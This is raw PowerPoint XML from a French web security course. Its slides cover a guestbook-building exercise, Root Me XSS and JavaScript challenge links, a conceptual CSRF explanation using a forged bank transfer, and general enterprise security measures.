            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391854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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cross-site Scripting - exercice</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Construire un livre d’or de la manière la plus simple possible, mais bien sûr fonctionnelle</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Créez une base de données avec une table ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>livredor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Créez une page, contenant :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un affichage des entrées du livre d’or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un formulaire pour ajouter un mot au livre d’or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l’insertion de ce mot en cliquant sur le bouton d’envoie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267377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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple Cross-site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ROOT ME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="2293126"/>
            <a:ext cx="11482934" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Premier pas avec Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.root-me.org/en/Challenges/Web-Client/Javascript-Source</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.root-me.org/en/Challenges/Web-Client/Javascript-Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="778BA2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="778BA2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3">
                <a:extLst>
                  <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                    <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                  </a:ext>
                </a:extLst>
              </a:hlinkClick>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exercice Cross-Site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="778BA2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="778BA2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stored-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18960112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51326B-60A2-489D-862A-6F1F0131AAEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Failles communes – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exemple </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD1046-8256-4DAB-A442-025A3A47D4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353569" y="2293126"/>
            <a:ext cx="11385398" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Type de menace web qui manipule le navigateur web pour qu'il effectue une action non désirée sur l'application ou le site web auquel un utilisateur est actuellement connecté.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="ctr">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une demande de virement d'une banque est falsifiée et le lien est intégré à un courriel ou à un site Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’utilisateur clique sur le lien sans se méfier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La banque reçoit la requête et réalise le virement depuis le compte de l’Utilisateur vers celui du pirate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDEA748-B1D8-4595-A264-6E7962D6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1208211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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La sécurité en entreprise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462AB5B3-6E3D-4837-936D-030D40E80169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Au niveau utilisateurs :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Comprendre l’importance de leur position</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Au niveau des technologies :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Droits d’accès des utilisateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Au niveau physique : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’accès à l’infrastructure, au matériel … </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Groupe 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EAD66C5-2856-4820-9010-C33DD140D725}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7385289" y="1805857"/>
            <a:ext cx="4106076" cy="2064749"/>
            <a:chOff x="7385289" y="1805857"/>
            <a:chExt cx="4106076" cy="2064749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B9E65FE-6277-48F3-9CCB-6685890218BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7385289" y="1805857"/>
              <a:ext cx="4106076" cy="2064749"/>
            </a:xfrm>
            <a:prstGeom prst="roundRec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17D591D3-29CF-452F-970B-90B63B739CD3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7499591" y="2352351"/>
              <a:ext cx="3991773" cy="1021883"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="00B050"/>
                </a:buClr>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="507E32"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Mettre en place une charte informatique.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="00B050"/>
                </a:buClr>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="507E32"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Réaliser des guides Utilisateurs.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="00B050"/>
                </a:buClr>
                <a:buSzPct val="150000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="§"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="507E32"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Filtrer les accès aux données.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Signe Plus 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EC0E2-7668-486F-A836-426FA782A581}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9211824" y="1853623"/>
              <a:ext cx="453006" cy="427839"/>
            </a:xfrm>
            <a:prstGeom prst="mathPlus">
              <a:avLst>
                <a:gd name="adj1" fmla="val 14825"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84382EC6-C506-4956-8F00-CF060CEC433D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
